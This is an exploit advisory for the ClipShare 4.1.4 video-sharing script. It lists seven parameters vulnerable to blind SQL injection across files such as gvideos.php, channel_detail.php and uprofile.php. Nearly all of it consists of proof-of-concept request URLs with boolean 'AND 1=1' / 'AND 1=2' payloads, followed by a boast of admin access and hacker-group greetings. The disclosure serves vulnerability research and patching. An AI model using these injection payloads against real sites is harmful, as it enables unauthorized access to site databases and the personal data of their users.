# Exploit Title: ClipShare 4.1.1 - Multiples Vulnerabilites # Exploit Author: Esac # Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4 # Official site: http://www.clip-share.com # Software License: Commercial. #all versions are vulnerable: #Last Checked: 27 March 2013 # Note : to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini) ============================================================================================== vuln file : gvideos.php , param : gid Poc : http://server/mavideo/gvideos.php?gid=1 [Blind] #to exlploit this poc , must group to be added previously with some videos publics Real exploitation : http://server/mavideo/gvideos.php?gid=1 AND 1=1 ==> return normal page http://server/mavideo/gvideos.php?gid=1 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : channel_detail.php , param : chid Poc : http://server/mavideo/channel_detail.php?chid=4 [Blind] Real exploitation : http://server/mavideo/channel_detail.php?chid=4 AND 1=1 ==> return normal page http://server/mavideo/channel_detail.php?chid=4 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : uprofile.php , param : UID Poc : http://server/mavideo/uprofile.php?UID=66 [Blind] Real exploitation : http://server/mavideo/uprofile.php?UID=66 AND 1=1 ==> return normal page http://server/mavideo/uprofile.php?UID=66 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : ufavour.php , param : UID Poc : http://server/mavideo/ufavour.php?UID=66 [Blind] Real exploitation : http://server/mavideo/ufavour.php?UID=66 AND 1=1 ==> return normal page http://server/mavideo/ufavour.php?UID=66 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : ufriends.php , param : UID Poc : http://server/mavideo/ufriends.php?UID=66 [Blind] Real exploitation : http://server/mavideo/ufriends.php?UID=66 AND 1=1 ==> return normal page http://server/mavideo/ufriends.php?UID=66 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : uplaylist.php , param : UID Poc : http://server/mavideo/uplaylist.php?UID=66 [Blind] Real exploitation : http://server/mavideo/uplaylist.php?UID=66 AND 1=1 ==> return normal page http://server/mavideo/uplaylist.php?UID=66 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : ugroups.php , param : UID Poc : http://server/mavideo/ugroups.php?UID=66 [Blind] Real exploitation : http://server/mavideo/ugroups.php?UID=66 AND 1=1 ==> return normal page http://server/mavideo/ugroups.php?UID=66 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- PwnEd. Tested version: Sunday , March 27, 2013 | Version: 4.1.4 | Username: admin | Logout Copyright © 2006-2008 ClipShare. All rights reserved. ~ Game Over ~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greetz : White Tarbouch Team & Cobra & Dami ==> Made In Moroco <== ./EsacБрой прочитания на тази страница: 873
ClipShare 4.1.1 – Multiples Vulnerabilites